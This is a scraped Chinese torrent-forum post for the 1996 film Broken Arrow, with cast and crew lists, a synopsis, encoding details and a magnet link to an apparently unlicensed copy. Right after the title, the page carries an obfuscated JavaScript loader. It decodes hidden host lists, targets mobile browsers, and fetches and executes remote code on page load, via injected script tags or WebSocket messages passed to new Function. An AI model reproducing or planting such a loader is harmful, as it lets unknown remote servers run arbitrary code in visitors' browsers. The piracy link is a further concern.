断箭[中文字幕].Broken.Arrow.1996.1080p.BluRay.x265.10bit.DTS 6.65GB

版主小s 1月前 272

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDA2OQ==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x6b\x62\x74\x42\x4f\x58\x63\x64\x53\x4e']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxzZGtmai41MS10b3VyLm5ldCxodHRwczovL29zbGRramZsLmNoYYW95aTQuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译 名 断箭 / 断箭行动(港)

◎片 名 Broken Arrow

◎年 代 1996

◎产 地 美国

◎类 别 动作 / 惊悚 / 犯罪

◎语 言 英语

◎上映日期 1996-02-09(美国)

◎IMDb链接 https://www.imdb.com/title/tt0115759/

◎豆瓣评分 7.3/10 (42572人评价)

◎豆瓣链接 https://movie.douban.com/subject/1293317/

◎片 长 108分钟

◎导 演 吴宇森 John Woo (id:1027853)

◎编 剧 格雷厄姆·约斯特 Graham Yost (id:1322426)

◎演 员 克里斯蒂安·史莱特 Christian Slater (id:1022597)

约翰·特拉沃尔塔 John Travolta (id:1054426)

萨曼莎·玛西丝 Samantha Mathis (id:1048132)

德尔罗伊·林多 Delroy Lindo (id:1040621)

鲍勃·冈顿 Bob Gunton (id:1041179)

弗兰克·威利 Frank Whaley (id:1010646)

豪威?隆 Howie Long (id:1115243)

沃迪·科蒂斯·霍尔 Vondie Curtis-Hall (id:1074193)

杰克·汤普森 Jack Thompson (id:1152253)

维托·鲁吉尼斯 Vyto Ruginis (id:1324327)

Ousaun Elam Ousaun Elam (id:1283084)

肖恩·托布 Shaun Toub (id:1317723)

凯西·比格斯 Casey Biggs (id:1064769)

Jeffrey Stephan Jeffrey Stephan (id:1360822)

Joey Box Joey Box (id:1077452)

Jon W. Kishi Jon W. Kishi (id:1360823)

Myke Schwartz Myke Schwartz (id:1297011)

吉姆·帕尔默 Jim Palmer (id:1293854)

Vince Deadrick Sr. Vince Deadrick Sr. (id:1360824)

Charlie Brewer Charlie Brewer (id:1276707)

Gary Epper Gary Epper (id:1079123)

马里奥罗伯茨 Mario Roberts (id:1295776)

J.N. Roberts J.N. Roberts (id:1360825)

柯特伍德·史密斯 Kurtwood Smith (id:1010600)

丹尼尔·冯·巴根 Daniel von Bargen (id:1165516)

布鲁斯·霍尔曼 Bruce Holman (id:1096432)

卡门·阿尔根齐亚诺 Carmen Argenziano (id:1057303)

布拉德·刘易斯 Brad Lewis (id:1289939)

Bill Badalato Bill Badalato (id:1277670)

Allison Lyon Segan Allison Lyon Segan (id:1297143)

汉斯·季默 Hans Zimmer (id:1054386)

彼得·莱维 Peter Levy (id:1276248)

乔·哈欣 Joe Hutshing (id:1287228)

约翰·赖特 John Wright (id:1301301)

Donna Isaacson Donna Isaacson (id:1287387)

Richard C. Goddard Richard C. Goddard (id:1284996)

Mary Malin Mary Malin (id:1290803)

苏珊·V·卡利诺夫斯基 Susan V. Kalinowski (id:1288039)

科琳·卡拉甘 Colleen Callaghan (id:1279892)

Jeanne Van Phue Jeanne Van Phue (id:1299857)

米歇尔·布勒 Michelle Bühler (id:1279844)

Angela Nogaro Angela Nogaro (id:1293245)

莎朗·伊尔森 Sharon Ilson (id:1287309)

加里·海姆斯 Gary Hymes (id:1287237)

David Ticotin David Ticotin (id:1299255)

Eric Durst Eric Durst (id:1282861)

克里斯托弗·埃文斯 Christopher Evans (id:1283336)

Jennifer German Jennifer German (id:1284737)

马修·格拉茨纳 Matthew Gratzner (id:1285331)

Rhonda C. Gunner Rhonda C. Gunner (id:1285640)

理查德·E·霍兰德尔 Richard E. Hollander (id:1286808)

伊恩·亨特 Ian Hunter (id:1287177)

雷·麦金太尔 Ray McIntyre Jr. (id:1291625)

Anthony 'Max' Ivins Anthony 'Max' Ivins (id:1287451)

Josh R. Jaggars Josh R. Jaggars (id:1287538)

丹·考夫曼 Dan Kaufman (id:1288219)

布拉德·库恩 Brad Kuehn (id:1289086)

Lawrence Littleton Lawrence Littleton (id:1290161)

Olivier Sarda Olivier Sarda (id:1296696)

Tim Donahue Tim Donahue (id:1282562)

约翰·德斯贾尔丁 John 'D.J.' Des Jardin (id:1282276)

Dobbie Schiff Dobbie Schiff (id:1302632)

雅克·斯特罗维斯 Jacques Stroweis (id:1298561)

David Sosalla David Sosalla (id:1298080)

Karl J. Martin Karl J. Martin (id:1291132)

Apurva Shah Apurva Shah (id:1297294)

克莱格·巴朗 Craig Barron (id:1277981)

Andrea D'Amico Andrea D'Amico (id:1281681)

Mike Chambers Mike Chambers (id:1280410)

◎标 签 动作 / 吴宇森 / 美国 / JohnTravolta / 美国电影 / 1996 / 电影 / 剧情

◎简 介

飞行员迪克斯(约翰?特拉沃塔 John Travolta 饰)和希尔上教(克里斯汀?史莱特 Christian Slater 饰)搭档多年,虽然表现出色,但一直没有获得晋升。心中不服气的迪克斯决定用自己的手段向政府讨回他应得的一切。于是,在一次飞行任务中,迪克斯为了劫持隐形飞机上的两枚核弹,将希尔打出了机舱,幸亏希尔携带有降落伞,才幸免于难。迪克斯取得核弹后,向政府要挟巨额赎金,不然就将在城市中引爆核弹。另一方面,希尔和美丽女警泰丽(萨曼莎?玛西丝 Samantha Mathis 饰)正在极力追寻迪克斯,抢回核弹!

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 184974807382260642093512674259395137455 (0x8B28DA1FEA18A9DB9549B9375D4FCFAF)

  4. Complete name : [email protected]kv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 6.64 GiB

  8. Duration : 1 h 48 min

  9. Overall bit rate : 8 778 kb/s

  10. Encoded date : UTC 2021-09-15 13:12:54

  11. Writing application : mkvmerge v56.1.0 ('My Friend') 64-bit

  12. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  13. Video

  14. ID : 1

  15. Format : HEVC

  16. Format/Info : High Efficiency Video Coding

  17. Format profile : Main [email protected]@Main

  18. Codec ID : V_MPEGH/ISO/HEVC

  19. Duration : 1 h 48 min

  20. Bit rate : 7 216 kb/s

  21. Width : 1 920 pixels

  22. Height : 812 pixels

  23. Display aspect ratio : 2.35:1

  24. Frame rate mode : Constant

  25. Frame rate : 23.976 (24000/1001/53354) FPS

  26. Color space : YUV

  27. Chroma subsampling : 4:2:0

  28. Bit depth : 10 bits

  29. Bits/(Pixel*Frame) : 0.193

  30. Stream size : 5.46 GiB (82%)

  31. Writing library : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit

  32. Encoding settings : rc=crf / crf=19.8000 / qcomp=0.70 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.75 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=9 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=4 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1920x812 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / no-repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  33. Default : Yes

  34. Forced : No


  35. Audio

  36. ID : 2

  37. ID in the original source medium : 4352 (0x1100)

  38. Format : DTS

  39. Format/Info : Digital Theater Systems

  40. Codec ID : A_DTS

  41. Duration : 1 h 48 min

  42. Bit rate mode : Constant

  43. Bit rate : 1 509 kb/s

  44. Channel(s) : 6 channels

  45. Channel layout : C L R Ls Rs LFE

  46. Sampling rate : 48.0 kHz

  47. Frame rate : 93.750 FPS (512 SPF)

  48. Bit depth : 24 bits

  49. Compression mode : Lossy

  50. Stream size : 1.14 GiB (17%)

  51. Title : eng

  52. Language : English

  53. Default : Yes

  54. Forced : No

  55. Original source medium : Blu-ray


  56. Text #1

  57. ID : 3

  58. ID in the original source medium : 4617 (0x1209)

  59. Format : PGS

  60. Muxing mode : zlib

  61. Codec ID : S_HDMV/PGS

  62. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  63. Duration : 1 h 42 min

  64. Bit rate : 33.7 kb/s

  65. Count of elements : 1565

  66. Stream size : 24.6 MiB (0%)

  67. Title : chs&eng

  68. Language : Chinese

  69. Default : Yes

  70. Forced : No

  71. Original source medium : Blu-ray


  72. Text #2

  73. ID : 4

  74. ID in the original source medium : 4618 (0x120A)

  75. Format : PGS

  76. Muxing mode : zlib

  77. Codec ID : S_HDMV/PGS

  78. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  79. Duration : 1 h 42 min

  80. Bit rate : 33.9 kb/s

  81. Count of elements : 1565

  82. Stream size : 24.8 MiB (0%)

  83. Title : cht&eng

  84. Language : Chinese

  85. Default : No

  86. Forced : No

  87. Original source medium : Blu-ray


  88. Text #3

  89. ID : 5

  90. ID in the original source medium : 4619 (0x120B)

  91. Format : PGS

  92. Muxing mode : zlib

  93. Codec ID : S_HDMV/PGS

  94. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  95. Duration : 1 h 42 min

  96. Bit rate : 17.7 kb/s

  97. Count of elements : 1565

  98. Stream size : 12.9 MiB (0%)

  99. Title : chs

  100. Language : Chinese

  101. Default : No

  102. Forced : No

  103. Original source medium : Blu-ray


  104. Text #4

  105. ID : 6

  106. ID in the original source medium : 4620 (0x120C)

  107. Format : PGS

  108. Muxing mode : zlib

  109. Codec ID : S_HDMV/PGS

  110. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  111. Duration : 1 h 42 min

  112. Bit rate : 17.9 kb/s

  113. Count of elements : 1565

  114. Stream size : 13.1 MiB (0%)

  115. Title : cht

  116. Language : Chinese

  117. Default : No

  118. Forced : No

  119. Original source medium : Blu-ray


  120. Text #5

  121. ID : 7

  122. ID in the original source medium : 4608 (0x1200)

  123. Format : PGS

  124. Muxing mode : zlib

  125. Codec ID : S_HDMV/PGS

  126. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  127. Duration : 1 h 40 min

  128. Bit rate : 23.9 kb/s

  129. Count of elements : 1923

  130. Stream size : 17.2 MiB (0%)

  131. Title : eng

  132. Language : English

  133. Default : No

  134. Forced : No

  135. Original source medium : Blu-ray


  136. Menu

  137. 00:00:00.000 : 第 01 章

  138. 00:05:28.286 : 第 02 章

  139. 00:13:03.157 : 第 03 章

  140. 00:17:41.977 : 第 04 章

  141. 00:20:00.908 : 第 05 章

  142. 00:22:59.336 : 第 06 章

  143. 00:26:38.930 : 第 07 章

  144. 00:33:55.241 : 第 08 章

  145. 00:42:54.655 : 第 09 章

  146. 00:50:53.008 : 第 10 章

  147. 00:53:59.402 : 第 11 章

  148. 01:04:42.712 : 第 12 章

  149. 01:08:48.165 : 第 13 章

  150. 01:11:17.147 : 第 14 章

  151. 01:14:29.882 : 第 15 章

  152. 01:18:00.509 : 第 16 章

  153. 01:20:56.184 : 第 17 章

  154. 01:26:34.189 : 第 18 章

  155. 01:28:49.532 : 第 19 章

  156. 01:30:31.175 : 第 20 章

  157. 01:33:05.580 : 第 21 章

  158. 01:42:13.418 : 第 22 章


TAGS 动作 惊悚 犯罪

磁力链:
  • magnet:?xt=urn:btih:49F2C502FC02F3F05AC7F758C4FF2D641692A3D7
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回